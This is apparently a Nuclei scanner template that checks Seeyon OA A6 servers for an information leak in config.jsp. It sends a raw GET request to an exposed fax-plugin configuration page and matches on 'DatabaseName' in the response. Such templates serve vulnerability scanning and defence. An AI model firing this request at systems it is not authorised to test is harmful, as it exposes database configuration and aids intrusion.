id: seeyon-oa-a6-config-jsp-info-leak

info:
  name: seeyon-oa a6 config.jsp user info leak
  author: SleepingBag945
  severity: medium
  description: 致远OA A6 config.jsp 敏感信息泄漏
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
  tags: seeyon,oa

http:
  - raw:
      - |
        GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DatabaseName"
      - type: word
        words:
          - "请在文本框内配置传真插件所需服务器的信息"
      - type: status
        status:
          - 200

# Enhanced by cs on 2022/07/05
